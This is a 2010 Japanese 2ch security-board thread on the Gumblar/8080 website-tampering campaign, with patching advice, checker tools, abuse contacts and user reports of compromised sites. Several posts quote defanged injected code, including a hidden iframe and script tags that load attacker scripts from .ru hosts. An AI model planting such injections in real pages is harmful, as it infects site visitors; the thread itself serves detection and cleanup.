【Gumblar/GENO】Web改竄ウイルス総合10【8080】
レス数が950を超えています。1000を超えると書き込みができなくなります。
0001名無しさん@お腹いっぱい。
2010/07/21(水) 15:13:48感染しているサイト・ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加して混乱するようなら別スレを立てて誘導してください
基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう
*** 危険と思われるサイトのアドレスはそのまま貼らないで全ての「.」を「●」に変えてください ***
*** 感染した場合はクリーンインストールと安全なPCからのFTPパスワードの変更を推奨します ***
【前スレ】
【Gumblar/GENO】Web改竄ウイルス総合スレ9【8080】
http://pc11.2ch.net/test/read.cgi/sec/1274675964/
0002名無しさん@お腹いっぱい。
2010/07/21(水) 15:14:27行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。
(1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2)Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する
(1)〜(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。
攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。
Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。
Acrobat JavaScriptを無効にする方法は以下の通り。
(1)Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2)「分類」の中の「JavaScript」を選択
(3)「Acrobat JavaScriptを使用」のチェックをクリア
(4)「OK」ボタンを押す
※サイトを運営されている方は、さらに次のことも実施していただきたい。
(1)管理サイトのページのソースに意味不明な文字列が埋め込まれていないか確認する
(2)改ざんされていたり、サイト管理に使うパソコンからウイルスが見つかった場合には、
ウイルスに感染していないパソコンを使用して管理サイトのパスワードを変更する
0003名無しさん@お腹いっぱい。
2010/07/21(水) 15:15:11下記については必ずアップデートしてください
使用していないものはアンインストール推奨です
■ Windows XPは可能ならば新しいOSに
■ Windows Update / Microsoft Updateを更新
・XP以下は念のためMicrosoft Updateに変更してアップデートする
■ Adobe Reader(Acrobat,Acrobat Reader)を更新 (使っていないならアンインストール)
ttp://get.adobe.com/jp/reader/
・インストール後本体をアップデート
ヘルプ → アップデートの有無をチェック
・Acrobat Javascriptをオフにする
編集 → 環境設定 → Javascript → 「Acrobat Javascriptを使用」のチェックを外す
■ Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意!)
ttp://get.adobe.com/jp/flashplayer/
ttp://www.adobe.com/jp/shockwave/download/alternates/#fp
・Flash Playerのバージョン確認
ttp://www.adobe.com/jp/software/flash/about/
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール)
ttp://www.adobe.com/jp/shockwave/download/alternates/#sp
■ Java Runtime Environmentを更新 (Javascriptとは違うので注意)
ttp://www.java.com/ja/
・Javaのバージョン確認
ttp://www.java.com/ja/download/installed.jsp
■ QuickTimeを更新 (メールアドレスの入力は不要。使っていないならアンインストール)
ttp://www.apple.com/jp/quicktime/download/
■ RealPlayerを更新 (使っていないならアンインストール)
ttp://jp.real.com/?mode=basic
0004名無しさん@お腹いっぱい。
2010/07/21(水) 15:16:11※javascriptをオフにすると、その機能を利用した一部のサイトが見られなくなる可能性があります
●InternetExplorer ツール→インターネットオプション→セキュリティ→
レベルのカスタマイズ→スクリプトのとこ全部無効にチェック
※ActiveXもOFF
●Opera ツール→クイック設定→「javascriptを有効にする」のチェックを外す
●safari 編集→設定→「JavaScriptを有効にする」のチェックを外す
●Sleipnir ツール→Sleipnirのオプション→ビュー(Trident)→
デフォルトセキュリティ欄の「JavaScriptの実行を許可する」のチェックを外す
●Lunascape ツール→設定→セキュリティ→スクリプトの実行を許可のチェック外す
※SP3でIE8を使うと重くなる場合、Sleipnir&IE8Sleipnirエディション
もしくはLunascape5を使うといいようです。
●Firefox ツール→オプション→コンテンツでJavaScript有効にするをはずす
0005名無しさん@お腹いっぱい。
2010/07/21(水) 15:16:54【改ざんサイトの調査など】
■ チェッカーサイト
・gredでチェック
ttp://www.gred.jp/
・aguse
ttp://www.aguse.net/
・WebGetter
ttp://rd.or.tp/get.php
・Dan's View Source
ttp://www.dan.co.uk/viewsource/
・飛び先のチェック by ぴょん基地の友達
ttp://www.kakiko.com/check/sample.html
0006名無しさん@お腹いっぱい。
2010/07/21(水) 15:17:59■インシデント報告の届出(JPCERT/CC)
https://www.jpcert.or.jp/form/
サイト管理者の連絡先不明の場合はWHOISからサーバー管理者へ通報してください。
以下、代表的なサーバー管理会社
デジロック https://www.value-domain.com/webabuse.php
OCN http://www.ocn.ne.jp/info/rules/abuse/
さくら https://secure.sakura.ad.jp/notify/form/abuse.phtml
ロリポップ https://lolipop.jp/support/inq/
GMOインターネットグループ https://secure.gmo.jp/contact/
インフォシーク (isweb) http://portal.faq.rakuten.co.jp/
DION http://www.auone-net.jp/security/knowledge/navi/index.html
NTTPCコミュニケーションズ http://www.nttpc.ne.jp/
ODN https://www.odn.ne.jp/support/question/input_netabuse.html
xserver (株式会社ベット) http://www.xserver.ne.jp/faq.php
heteml ヘテムル https://secure.heteml.jp/support/inquiry/
ファーストサーバ http://www.firstserver.co.jp/contact/index.html
エキサイト http://www.excite.co.jp/help/support
0007名無しさん@お腹いっぱい。
2010/07/21(水) 15:18:40ウイルス・不正アクセス届出状況について(3月分および第1四半期)
http://www.ipa.go.jp/security/txt/2010/04outline.html
(3)ウェブサイト改ざんの被害発生時の対処
ウェブサイトが改ざんされてしまった場合、ウェブサイト管理者は被害者であると同時に、ウェブサイト利用者に対する加害者となってしまう可能性があります。
被害の拡大を防ぐために、次に示すような対応が求められます。
▼まず初めに行うべきこと
まず初めに行うことは、早急にウェブサイトの公開を停止することです。同時に ftp のパスワードの変更も行ってください。
このとき、これまでウェブサイトの管理に利用していたパソコンには、ftp のパスワードを盗聴するウイルスが感染している可能性があるため、別のパソコンから操作することを勧めます。
同時に、別のウェブサイトを立てるなどして、ウェブサイト利用者に対して調査状況の説明や、問い合わせ用窓口を設けるなど、随時情報提供に努めてください。
▼改ざん箇所の洗い出し等の調査
上記の対応を行ったのち、保管しておいたクリーンなファイルとウェブサーバ上のファイルの比較などの方法で、全ての改ざん箇所の洗い出しを行ってください。
また、同じパソコンで管理しているウェブサイトが複数ある場合、他のウェブサイトにも改ざんが及んでいる可能性があるため、必ず全てのウェブサイトのファイルを確認してください。
また、改ざん期間等を把握するため、改ざん箇所ごとに ftp のアクセスログの確認などを行なって、被害状況等の調査を行ってください。
▼ウェブサイトを再公開する場合
上記の対応で全ての改ざん箇所の修正を行った上で、ウェブサイトの公開を再開する場合、必ずウェブサイト利用者への改ざんの事実の告知も掲載してください。
ウェブサイト再開の際には、判明した範囲で、次に示す情報を告知することを勧めます。
改ざんの事実の説明
・ 改ざんされていた箇所
・ 改ざんされていた期間
・ ウェブサイト利用者が改ざんされていた箇所を閲覧した場合に想定される被害(ウイルス感染など)の説明
・ ウイルスのチェック方法の説明(必要に応じてオンラインスキャンサイトの紹介など)
・ 問い合わせ用窓口の連絡先
IPAに不正アクセスの届出
http://www.ipa.go.jp/security/ciadr/index.html
0008名無しさん@お腹いっぱい。
2010/07/21(水) 16:25:49設定例:JaneView
設定>基本>機能>コマンド欄で
コマンド名 任意の名前
実行するコマンドに 任意のURL
を記載して追加。終わったら「よろし」をクリック。
これで設定完了。
http://www.geocities.jp/nanasi_san_exe/online_help/option/function/command.html
これで専ブラから検索でチェックできるようになります。
以下がそのコマンドの一例になります。
aguse.net サイト情報検索=http://www.aguse.net/result1.php?url=$LINK
飛び先のチェック=http://www.kakiko.com/check/?$LINK
WebGetterでソースを見る=http://rd.or.tp/get.php?site=$LINK&act=view
WebGetterでタグを除去してソースを見る=http://rd.or.tp/get.php?site=$LINK&act=strip
WebGetterでリンクを抽出する=http://rd.or.tp/get.php?site=$LINK&act=link
Dan's View Sourcelでソースを見る=http://www.dan.co.uk/viewsource/index.php?url=$LINK
Dr.WEB=http://online.drweb.com/result?url=$TEXT$LINK
0009名無しさん@お腹いっぱい。
2010/07/21(水) 16:28:02テンプレ乙
0010名無しさん@お腹いっぱい。
2010/07/21(水) 17:10:35http://pc11.2ch.net/test/read.cgi/sec/1278430098/
なんでこっちじゃいかんの?
0011名無しさん@お腹いっぱい。
2010/07/21(水) 17:31:04取扱注意
www●kakiyasuhonten●co●jp
999 名前:名無しさん@お腹いっぱい。:2010/07/21(水) 13:52:18
store●nextbusinesssystem●com
www●kidsdrink●jp
0012名無しさん@お腹いっぱい。
2010/07/21(水) 17:39:430013名無しさん@お腹いっぱい。
2010/07/22(木) 15:49:34スレチ承知スマソだけど8080使いそうで怖すぎる
0014名無しさん@お腹いっぱい。
2010/07/22(木) 15:59:26今のところは標的型だから実物は発電所勤務とかでもなきゃ手に入らないんじゃね。
0015名無しさん@お腹いっぱい。
2010/07/23(金) 01:19:56なし。まぁ感染するウイルスは定期的に差しかえられるので、
毎日が0デイ状態のようなもの・・・
ttp://www.virustotal.com/analisis/42c9f334b7de4a63ed92be606a650d59771fb354fa49f4399d098c24529c925d-1279803865
0016名無しさん@お腹いっぱい。
2010/07/23(金) 17:47:55検体欲しぃの
0017名無しさん@お腹いっぱい。
2010/07/23(金) 20:11:16コーエーテクモもGumblar感染?
0018名無しさん@お腹いっぱい。
2010/07/23(金) 20:15:02botnetの顧客への販売(インチキセキュソフトの販売等)だろうから。
まだZeuSとかのがありえる。
0019名無しさん@お腹いっぱい。
2010/07/23(金) 20:21:060020名無しさん@お腹いっぱい。
2010/07/23(金) 20:36:250021名無しさん@お腹いっぱい。
2010/07/24(土) 17:35:480022名無しさん@お腹いっぱい。
2010/07/24(土) 17:41:130023名無しさん@お腹いっぱい。
2010/07/24(土) 17:46:54あぅあぅ〜
0024名無しさん@お腹いっぱい。
2010/07/24(土) 17:48:190026名無しさん@お腹いっぱい。
2010/07/25(日) 05:18:350027名無しさん@お腹いっぱい。
2010/07/25(日) 13:18:20SQLインジェクション系攻撃にやられたんじゃねーの?
うちのサイトは、アプリ更新あるごとに外部のセキュリティー企業で診断+Webファイアウォール導入だな
0028名無しさん@お腹いっぱい。
2010/07/25(日) 14:37:47http://support.kaspersky.co.jp/viruses/solutions?qid=208283462
を使用したところ
Spliced functions という値が32(ほかの値は0)という結果が表示されました
何度かツールを実行したのですが Spliced functions の値がずっと 1 のままです。
これは既に感染していると考えてよろしいのでしょうか?
0029名無しさん@お腹いっぱい。
2010/07/25(日) 18:19:090030名無しさん@お腹いっぱい。
2010/07/27(火) 19:01:280031名無しさん@お腹いっぱい。
2010/07/28(水) 11:11:080032名無しさん@お腹いっぱい。
2010/07/28(水) 13:59:32そもそもzlkon.lv→gumblar.cn→martuz.netだったわけだし。
これらは日本を除外している( >>31 )。
ru多めなのは8080。
0033名無しさん@お腹いっぱい。
2010/07/28(水) 14:00:340034名無しさん@お腹いっぱい。
2010/07/28(水) 14:34:40まだ読んでないけど、実際はUSが多いのかthx
>>32
8080型に多いのは知ってるんだけどさ
TLDがruに偏ってたのはなんでだろうなーと思って
特に理由はないのかね
0035名無しさん@お腹いっぱい。
2010/07/28(水) 14:48:070036夷塚 ◆y0JEaK6O/gDf
2010/07/29(木) 20:37:57www●crimsontech●jp/jp/home●html
> 弊社ホームページに関するお詫びとお知らせ
対応してくれた模様、感染の公表とIPAへの報告に感謝
もうちょっと早かったら言うことなかったなあ
で、本スレどっち…
0037名無しさん@お腹いっぱい。
2010/07/30(金) 14:23:39http://pandajapanblogs.blogspot.com/2010/07/fbi.html
0038名無しさん@お腹いっぱい。
2010/07/30(金) 22:12:080039名無しさん@お腹いっぱい。
2010/07/30(金) 23:15:08感染PC全部駆除の刑。
0040名無しさん@お腹いっぱい。
2010/07/30(金) 23:44:11ポケモンの公式ページ、
新しいポケットモンスターのこと知ってますかのページの
左上任天堂ロゴのリンク先おかしいぞ
社員見てるならさっさと直せ
497 名前:名無しさん必死だな[sage] 投稿日:2010/07/30(金) 21:18:47 0
クリックしたらパス求められるな
任天堂HPにもGumblarか?
0041名無しさん@お腹いっぱい。
2010/07/30(金) 23:52:110042名無しさん@お腹いっぱい。
2010/07/31(土) 00:07:55本当に死ねばいいのに
0043名無しさん@お腹いっぱい。
2010/07/31(土) 01:34:47鍵開けてたら泥棒に入られましたみたいな
0044名無しさん@お腹いっぱい。
2010/07/31(土) 09:36:27放火魔が出ているのに燃えやすいものを置きっぱなしにして
火事になり、近隣まで延焼で大迷惑。
0045名無しさん@お腹いっぱい。
2010/08/02(月) 00:10:24PC初心者でもすぐにできる対処法だけで完璧に防げるならその物言いも罷り通るんだけどな
現実は日々ゼロデイ
0046名無しさん@お腹いっぱい。
2010/08/03(火) 00:41:46日本には「○○入れてるから大丈夫」という
セキュリティソフト依存症患者(精神疾患)が多いからなw
壁や屋根に穴が空いてたり、鍵や窓が壊れていても
「セコム入ってるから大丈夫(キリッ」
(´・ω・`)
0047名無しさん@お腹いっぱい。
2010/08/03(火) 04:17:41http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2307
0048名無しさん@お腹いっぱい。
2010/08/04(水) 10:08:04いまだにXP使ってたりFirefox使ってるアホが多いからこんなに感染者が増えるんだよ
Firefoxが高セキュリティーとかガセネタ流してるアホは全員死刑にすべき
0049名無しさん@お腹いっぱい。
2010/08/04(水) 11:00:57どっちが安全?
0050名無しさん@お腹いっぱい。
2010/08/04(水) 11:16:07このソフトなら安全と過信している時点でその類だよ。
そもそも100%感染防止なんてできないのに
感染防止策だけで満足しているにわかは多い。
0051名無しさん@お腹いっぱい。
2010/08/04(水) 11:33:53RequestPolicyがあれば他ドメインへの通信はしないから外部接続系には安全
アクセス自体しないんだから当たり前
Chromeはアクセスしちゃうけどなんで大丈夫なの?
0052名無しさん@お腹いっぱい。
2010/08/04(水) 11:39:440053名無しさん@お腹いっぱい。
2010/08/04(水) 11:46:59ttp://blog.fourteenforty.jp/blog/2010/04/windows-xpgoogl.html
スレ汚し失礼
0054名無しさん@お腹いっぱい。
2010/08/04(水) 16:33:530055名無しさん@お腹いっぱい。
2010/08/05(木) 15:09:30www●1on1●jp
www●untiens●jp
ログにはru8080へ接続した形跡があるけど、aguseだと検出しないという…
ruドメインのjsファイルが呼び出された後に8080サイトへ行ってるみたいだが…
0056名無しさん@お腹いっぱい。
2010/08/06(金) 14:31:130057コテハン ◆8080adndqg
2010/08/06(金) 14:33:25■現行型
チャイナ・テーブル 八菜香
398133●com/
当選者発表|柿安創業138周年感謝祭
www●kakiyasuhonten●co●jp/m138th
禿に捕捉(キャッシュ)されてまつw
■トラップ(はぢめて見た)
【楽々茶 LALACHA】:中国茶・茶器・雑貨専門店
www●lalacha●com/
↓
<iframe src=”hxxp://parkperson●ru:8080/index●php?pid=13” width=”0” height=”0” style=”display:none”></iframe>
■旧型(絶賛放置中)
hnfko●web●fc2●com/yama/20080428_shishigatake/index●html
adajo●namidaame●com/
0058名無しさん@お腹いっぱい。
2010/08/06(金) 15:03:10他は知らんw
005958
2010/08/06(金) 19:33:39--
この度は当社サイトについてご連絡頂き誠にありがとうございました。
〜〜中略〜〜
ご連絡を受けまして確認の上速やかに削除いたしました。
重ねてお礼申し上げます。
--
との事。
0060名無しさん@お腹いっぱい。
2010/08/08(日) 15:57:11http://itpro.nikkeibp.co.jp/article/COLUMN/20100801/350884/
0061名無しさん@お腹いっぱい。
2010/08/09(月) 16:43:43これは新しい…
0062名無しさん@お腹いっぱい。
2010/08/09(月) 17:12:550063名無しさん@お腹いっぱい。
2010/08/09(月) 20:58:36/*SOS*/
飛び先はNortonセーフウェブで黒判定。
0064名無しさん@お腹いっぱい。
2010/08/09(月) 21:14:480065名無しさん@お腹いっぱい。
2010/08/09(月) 21:44:46× 飛び先が真っ黒なのを確認
○ 飛び先のサイトが真っ黒なのを確認
youhelpnow●ru:8080
0066名無しさん@お腹いっぱい。
2010/08/09(月) 21:50:44やられるやつって相当アホだろ
0067名無しさん@お腹いっぱい。
2010/08/09(月) 22:49:14全cssの末尾に何か付いてる
0068名無しさん@お腹いっぱい。
2010/08/09(月) 22:56:25どもです。
cssにも付くようになったのね。。。
0069名無しさん@お腹いっぱい。
2010/08/10(火) 01:08:37末尾「.txt」にして送付、ひげおじさんからお返事。
> 〜.css.txt - Trojan-Downloader.JS.Agent.fnh
>
> New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.
0070名無しさん@お腹いっぱい。
2010/08/10(火) 01:23:31これマジ?
0071名無しさん@お腹いっぱい。
2010/08/10(火) 01:25:32http://www.fuzita.org/spams/spamdiary.html
<html><head><script>location = 'http://xxxxxx/';</script></head></html>
↑こんな一行htmlをUPしてスパムの中継にも使われてる
0072名無しさん@お腹いっぱい。
2010/08/10(火) 02:09:24\(^o^)/オワタ
0073名無しさん@お腹いっぱい。
2010/08/10(火) 02:12:08\(^o^)/直リンクw
0074名無しさん@お腹いっぱい。
2010/08/10(火) 02:16:41Exploit.HTML.HCP.a
0075名無しさん@お腹いっぱい。
2010/08/10(火) 10:04:49オンラインゲームのパス抜きのもの
ilion.blog47.fc2.com/blog-entry-201.html
www.virustotal.com/jp/analisis/cdff7e34478a48929083674034e97fb773dcf40ccef8e70b6f6a2e56fa34c870-1281401616
>>66
ノーガードとかアホとか関係なくって、ソフトウェアの
脆弱性をふさいでるかどうか
0076名無しさん@お腹いっぱい。
2010/08/10(火) 16:18:370077名無しさん@お腹いっぱい。
2010/08/10(火) 19:27:11この短時間でアプリの穴を修正できるわけがない、と思ったら停止しただけでござる。
2010.08.10 2011年度向け商品開発中のため現在、
商品ページがご覧になれなくなっています。
ご迷惑をおかけしますが何卒ご了承ください。
0078名無しさん@お腹いっぱい。
2010/08/10(火) 20:07:37www●bmisland●net/input/mailmag/detail●asp?MAGID=31&MAGCLS=274&SDFLG=1
0079名無しさん@お腹いっぱい。
2010/08/11(水) 05:11:560080名無しさん@お腹いっぱい。
2010/08/11(水) 09:14:04www●dousoukainet●jp/plan●asp
0081名無しさん@お腹いっぱい。
2010/08/11(水) 21:18:370082名無しさん@お腹いっぱい。
2010/08/11(水) 22:04:54本気で作者を頃してやりたいわ
つーか本気で氏ねよ銃殺されろ
作者の国に核落とされて滅んじまえ
0083名無しさん@お腹いっぱい。
2010/08/11(水) 23:22:44セキュリティソフトは関係ないよ。
現時点での話に限れば、それはIEブラウザ、かつWindows Updateを
しとらん場合に攻撃が成立しうる。
逆に8080やgumblar.xはブラウザの種類は関係ない。
アクセスしてきたブラウザに応じた攻撃コードが生成されるように
なっとる。
0084名無しさん@お腹いっぱい。
2010/08/12(木) 01:05:00*/yahoo.js*
全部蹴ればええやんw
0085名無しさん@お腹いっぱい。
2010/08/12(木) 01:06:35ニュースで窃盗事件が流れるたびにそこまで考えてたら疲れないか?
とっくに地球滅びてるよな
0086名無しさん@お腹いっぱい。
2010/08/13(金) 14:23:50けいおんのモデルの子も同窓会ネットで顔バレしてるぞ
http://www.dousoukainet.jp/plan.asp
だから言わんこっちゃない┐(VДV)┌
336 :風の谷の名無しさん@実況は実況板で:2010/08/13(金) 02:37:24 ID:LsxSDH1C0
>>311
これ前にも見たけど
けいおんのモデルになったJKって美人ではあるけどアニメには劣るよな
所詮3次元('A`)
387 :風の谷の名無しさん@実況は実況板で:2010/08/13(金) 02:55:26 ID:z25JrXmm0
>>311
そのページのどこにも写真ないんだけど
411 :(VдV) ◆yUyb3Tqn92 :2010/08/13(金) 03:09:49 ID:PPZzZ1Px0
(VДV)部アッハッハッハはヒャ日波や八はアッハハハyはyヒャヒャヒャhyはyはy早はh!
俺様が貼ったのは最新のウィルスだよ
(<●>Д<●>)踏んだ奴ざまぁあああああああああああああああああああああああああっ!
駆除方法はメール欄参照な:(>w<):
416 :(VдV) ◆yUyb3Tqn92 :2010/08/13(金) 03:17:09 ID:PPZzZ1Px0
さてウィルス(>>311)も踏ませたことだし
もう寝るお
(VдV)踏んだ奴は徹夜してリカバリするかLANケーブル外しとくことだな
どちらにせよお前らがウィルス対策の作業している間、俺様はグッスリzZZだお♪
0087名無しさん@お腹いっぱい。
2010/08/13(金) 14:53:05http://www.itmedia.co.jp/enterprise/articles/1008/12/news061.html
とうとうWinだけの問題じゃなくなってきたな
0088名無しさん@お腹いっぱい。
2010/08/13(金) 15:06:17だからそういう奴がいるから
結局●とか入れても意味ねーんだよ
なので次からURL貼るときは●抜きを許可する
0089名無しさん@お腹いっぱい。
2010/08/13(金) 17:36:26これはどういうウイルスですか?
0090名無しさん@お腹いっぱい。
2010/08/13(金) 17:41:06これ踏んじゃったんだけどJavaScript切っていれば大丈夫?
0091名無しさん@お腹いっぱい。
2010/08/13(金) 18:16:38これって禿.jsって奴?
Firefox+NoScriptなら踏んでもOK?
0092名無しさん@お腹いっぱい。
2010/08/13(金) 19:08:27おk
0093名無しさん@お腹いっぱい。
2010/08/13(金) 19:30:30ネトゲのトロイ。
0094名無しさん@お腹いっぱい。
2010/08/13(金) 19:42:340095名無しさん@お腹いっぱい。
2010/08/13(金) 20:08:070096名無しさん@お腹いっぱい。
2010/08/13(金) 20:10:010097名無しさん@お腹いっぱい。
2010/08/13(金) 20:12:14ネトゲやってないからよく分からないけど
右上のにID、PASSを入力したらネトゲアカウント取られるってやつ?
0098名無しさん@お腹いっぱい。
2010/08/13(金) 20:29:08そんな奴らは絶対IEなんか使っちゃ駄目だろ
別にFirefox厨じゃないけどFirefox+NoScriptでブラウジングしておきゃ感染しないんだから
初心者にはこの組み合わせを薦めるべき
入れるだけでおkなんだから
0099名無しさん@お腹いっぱい。
2010/08/13(金) 20:37:55>>2よりも>>4こっちが最優先
0100名無しさん@お腹いっぱい。
2010/08/13(金) 20:38:412行で済むことをそんな必死に書く低脳が言っても説得力0なんだぜ
0101名無しさん@お腹いっぱい。
2010/08/13(金) 20:41:300102名無しさん@お腹いっぱい。
2010/08/13(金) 20:42:280103名無しさん@お腹いっぱい。
2010/08/13(金) 22:25:13初心者にそんなもんすすめても
動かなくなったって言ってIEにもどるだけだろ
本人のできる範囲で対策させないと何の意味もない
0104名無しさん@お腹いっぱい。
2010/08/13(金) 22:33:48SBMSPAM業者でもgumblar8080判定。
0105名無しさん@お腹いっぱい。
2010/08/13(金) 22:53:17ここでは異常なしって流れになってるがどっちが本当なの?
勇気がなくて踏めないURL鑑定スレin初質 Part42
http://toki.2ch.net/test/read.cgi/qa/1277970504/
0106名無しさん@お腹いっぱい。
2010/08/13(金) 23:05:55通報してんのになんでだ!
0107名無しさん@お腹いっぱい。
2010/08/13(金) 23:30:14ここは鑑定スレじゃない
0108名無しさん@お腹いっぱい。
2010/08/13(金) 23:53:16そのURLに関しては大丈夫 とだけ書いておく
0109名無しさん@お腹いっぱい。
2010/08/14(土) 00:04:11器物損壊で被害届け出せば?(笑
0110名無しさん@お腹いっぱい。
2010/08/14(土) 01:58:19法律に無知な奴は恥ずかしいから発言するなよ
夏厨死ね!
0111コテハン ◆8080adndqg
2010/08/14(土) 03:23:55古いやつ・・
/AC_RunActiveContent.js
>Last-Modified: Fri, 29 Jan 2010 20:48:14 GMT
0112名無しさん@お腹いっぱい。
2010/08/14(土) 09:58:00いつまで続くかな
0113名無しさん@お腹いっぱい。
2010/08/15(日) 02:40:56何年も前からやってて逮捕されてない有名人なんだから
法律が改正でもされん限り続くだろ
0114名無しさん@お腹いっぱい。
2010/08/15(日) 08:17:06イカタコウィルスもそうだが、今までは手をこまねいていたものを
無理矢理何かにあてはめてタイーホというのはよくある話。
特に、その時点の署長や長官が興味を持つと、強制捜査したり
するようになる。
0115名無しさん@お腹いっぱい。
2010/08/15(日) 22:23:27お前法律わかってないだろw
無知乙
0116名無しさん@お腹いっぱい。
2010/08/15(日) 22:29:36ちょっとしたイカタコとか例に出してるとこから見て
なにか面白いニュースがあるとすぐそれを引用したがるんだろうな
リアルで馬鹿な分ネットで知的ぶりたいだけだと思う
0117名無しさん@お腹いっぱい。
2010/08/15(日) 22:32:17まあ過疎すれだからいいけど
あと「ちょっとした」の部分は抜いて読めよ
0118名無しさん@お腹いっぱい。
2010/08/15(日) 22:46:38減ってきてるのか?それともスレ分裂のせいか。
0119コテハン ◆8080adndqg
2010/08/15(日) 23:16:58■関東学生アメリカンフットボール連盟公式ホームページ
www●kcfa●jp/
※7月21日以前から陥落してるっぽい
■京都大学漫画研究部
kyoto-u-mk●hp●infoseek●co●jp/
※更新履歴の中に紛れ込んでる・・
【改竄】絶賛ループ中w【再改竄】
darkside●higashino●jp/ms●cgi?ShowDiary_file=/lasertank/1281712375&blogid=&t=sketch
※コメント欄
>報告ありがとうございます。
>前回より被害範囲は狭まっています。
>追加対策して、根比べです。
>必ず追い出します。
クリーンインストールしろよwww
0120名無しさん@お腹いっぱい。
2010/08/15(日) 23:50:12それちょっとアホの子だなあ
根絶させるためにJPCERT/CC経由でやってもらったほうがいいかも
0121名無しさん@お腹いっぱい。
2010/08/16(月) 00:04:52ソースでは末尾なんだろうね。
それより後ろはiswebが勝手に入れる広告なので。
0122名無しさん@お腹いっぱい。
2010/08/16(月) 15:07:02叩くとホコリが出てきそうなWeb屋だなw
0123名無しさん@お腹いっぱい。
2010/08/16(月) 16:24:52■7月12日(たぶん改竄記念日)
darkside●higashino●jp/ms.cgi?t=sketch&blogid=&ShowDiary_file=/lasertank/1278935970
コメントにセキュリティソフト云々・・・
■7月13日
darkside●higashino●jp/ms.cgi?t=sketch&blogid=&ShowDiary_file=/lasertank/1279023797
>『何か謎ですね』
>急に報告が来てるので、試しにウイルスバスター2010試用版を入れてみました。
>特におかしなものは検出されていません。
>written by IDK ←管理人
■8月2日(祝!再改竄)
darkside●higashino●jp/ms●cgi?t=sketch&blogid=&ShowDiary_file=/lasertank/1280752626
>『やられた』
>警告は出てないし心当たりはないしで困ってます。
>といいつつ実は心当たりあるので対策してみます。具体的内容については、攻撃者に情報を与えないため伏せておきます。
>written by IDK ←管理人
■8月13日(祝!再々改竄ww)
>>119を参照
■8月14日
Google先生に「このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。」の称号を授与されました
www.google.com/safebrowsing/diagnostic?site=darkside●higashino●jp&hl=ja
笑いすぎて腹痛えwwwwww
0124名無しさん@お腹いっぱい。
2010/08/16(月) 23:15:26削除をしたらインターネットの方は軽快になったもののこれって見つけて削除をすれば問題のないウィルスですか?
0125名無しさん@お腹いっぱい。
2010/08/18(水) 11:57:580126名無しさん@お腹いっぱい。
2010/08/19(木) 01:03:06専ブラなら誤検出なだけだろ
0127名無しさん@お腹いっぱい。
2010/08/19(木) 10:03:060128名無しさん@お腹いっぱい。
2010/08/19(木) 23:43:20街歩くためにいちいちボディガードで周り固めればいいじゃんって言ってるようなもんだよな
java使うページも昨今増えてるのに「javaきればおk」って不便さを顧みない思考停止寸前モノとしか……
0129名無しさん@お腹いっぱい。
2010/08/20(金) 00:11:210130コテハン ◆8080adndqg
2010/08/20(金) 00:15:44calliy●com/
関西大学なぎなた部
s1●shard●jp/kunagi
Gumblarっぽいのが混ざってるような気が・・
--本日の目玉商品--
【このサイトはコンピュータに損害を与える可能性があります。】
企業コンサルティング、ラジオ番組制作、ECサイト運営、WEB制作の株式会社エントランス。
www●en-trance●co●jp/
↓
■セーフ ブラウジング 診断結果
www.google.com/safebrowsing/diagnostic?site=www●en-trance●co●jp/&hl=ja
>疑わしいサイトとして認識されています。>このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。
0131名無しさん@お腹いっぱい。
2010/08/20(金) 00:18:44JAVAとJAVAScriptの違いもわからんバカはスルーしろよw
0132名無しさん@お腹いっぱい。
2010/08/20(金) 00:39:23contents-edu●mind●meiji●ac●jp
>fucked by U#0h4x0r Blog:www.noahacker.com fuck jps all killer in the war !
※8080系に陥落
0133名無しさん@お腹いっぱい。
2010/08/20(金) 18:28:360134名無しさん@お腹いっぱい。
2010/08/20(金) 18:29:450135名無しさん@お腹いっぱい。
2010/08/21(土) 02:25:32>>130の内、残ってる分。
> kunagi
大学にメルポ
> en-trance
AC_RunActiveContent●jsに別のがあったのでWhoisからメルポ
0136夷塚 ◆y0JEaK6O/gDf
2010/08/21(土) 15:49:23s1●shard●jp/kunagi
→jsunpack.jeek.org/dec/go?report=a812e039d6e8c23954264744097626222a6d00dc
0137コテハン ◆8080adndqg
2010/08/21(土) 18:57:10【陥落サイトのURL悪用厳禁】
CODE1(なつかしー)+8080(現行型)+一番下はガンブラコ・・なのか?
www●simpleds●biz/
0138コテハン ◆8080adndqg
2010/08/21(土) 19:05:02jsunpack.jeek.org/dec/go?report=bc5e43cdd9bff71b13258346a81d439ac14ae5b8
0139コテハン ◆8080adndqg
2010/08/22(日) 22:00:21新ガンブラ子なのか?
<8080のコード><!--「32桁の英数字」--><script src=http://〜中略〜.php ></script>
↓
www●yenisehirliyiz●biz
danraf●by●ru
hiero●expo●ru ←改竄祭開催中(危)
※他にもたくさんある
■検索わーど
".ru/" ".js></script><--" "--><script src=" ".php ></script>"
■日本のサイトも陥落してるっぽい
detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1445102614
あと、コード一行だけってコレかな?
roseplaceseniorassistedliving●com
0140名無しさん@お腹いっぱい。
2010/08/23(月) 21:21:23</HTML>
<script type="text/javascript" src="http://riotassistance●ru/Template●js"></script>
<!--68a2c5dd53f8db2f85dd899d63a960bb-->
コンテンツはオン・ザ・エッヂ当時のままっぽいが、よくわかんない奴の手に落ちてる?
0141名無しさん@お腹いっぱい。
2010/08/24(火) 21:03:570142名無しさん@お腹いっぱい。
2010/08/25(水) 00:28:19■DLLのロード方法を狙う新たな攻撃手法〜マイクロソフトがアドバイザリ公開
